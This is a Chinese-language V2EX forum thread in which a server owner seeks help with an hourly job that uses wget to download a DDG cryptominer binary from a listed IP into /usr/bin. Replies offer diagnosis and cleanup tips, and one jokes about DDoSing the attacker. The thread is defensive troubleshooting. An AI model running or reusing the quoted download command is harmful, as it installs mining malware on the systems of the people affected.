求助，每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
ip 103.27.42.76 是日本
每小时执行的恶意命令，如何找到执行的文件在位置，或者是不要他运行，wget 能卸载么
没有找到定时任务

sadwin

2020-04-18 11:32:04 +08:00

有在跑 redis 吗？有可能是 redis 被黑了

renmu

2020-04-18 11:34:25 +08:00

cron 里没有?最好的方法就是重装系统

claysec

2020-04-18 11:38:40 +08:00

没有重要东西就直接重装系统。

sadwin

2020-04-18 11:45:14 +08:00

可以看下这个 https://www.v2ex.com/t/623847

GGGG430

2020-04-18 11:45:57 +08:00

首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
其次可以通过 alias 重命名 wget 为其他命令

cnzjl

2020-04-18 11:48:23 +08:00

最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令

2020-04-18 13:42:34 +08:00

建议重装，想排查问题可以先
> /usr/bin/uvggee
chmod 000 /usr/bin/uvggee
chattr +i /usr/bin/uvggee
然后再排查问题

imdong

2020-04-18 14:23:47 +08:00

非专业，笨笨的方法：

比如自己写一个 shell 命名为 wget，然后在里面获取一些父进程信息？
然后用这个 shell 替换(覆盖) wget ？？

won

2020-04-18 14:32:35 +08:00

1 top 到进程号
2 ll 到执行位置
3 rm 掉
4 crontab 里删除，并添加一个 1 分钟守护
5 restart

i999999

2020-04-18 15:20:05 +08:00

建议重装系统，没办法重装的话可以把 wget 和 curl 工具重命名

guog

2020-04-18 15:23:14 +08:00

七天了，楼主这个问题还没解决？大家给你的方案你试过了吗

Rxianbei

2020-04-18 15:23:47 +08:00

@cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis，但是没有公网，装了都大半年了，想来也后怕，请问应该怎么排查？

ying5201314

2020-04-18 17:11:32 +08:00

试过了，主要不能重装，不然早解决

ying5201314

2020-04-18 17:16:49 +08:00

试过了，主要不能重装，不然早解决 1
@guog

xupefei

2020-04-18 17:30:06 +08:00

还有个可能是服务器跑了 yarn 。

Guys

2020-04-18 17:51:04 +08:00

先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.

musi

2020-04-18 17:51:28 +08:00

你在 v2 上发个求 d 帖把那个服务器 d 挂就好了

xingheng

2020-04-18 19:34:05 +08:00

pstree 找到是哪个主进程启动的 wget，然后删除主进程的执行文件就行了吧。难道还有守护进程？？尝试 watch+pstree 。

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/663696

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.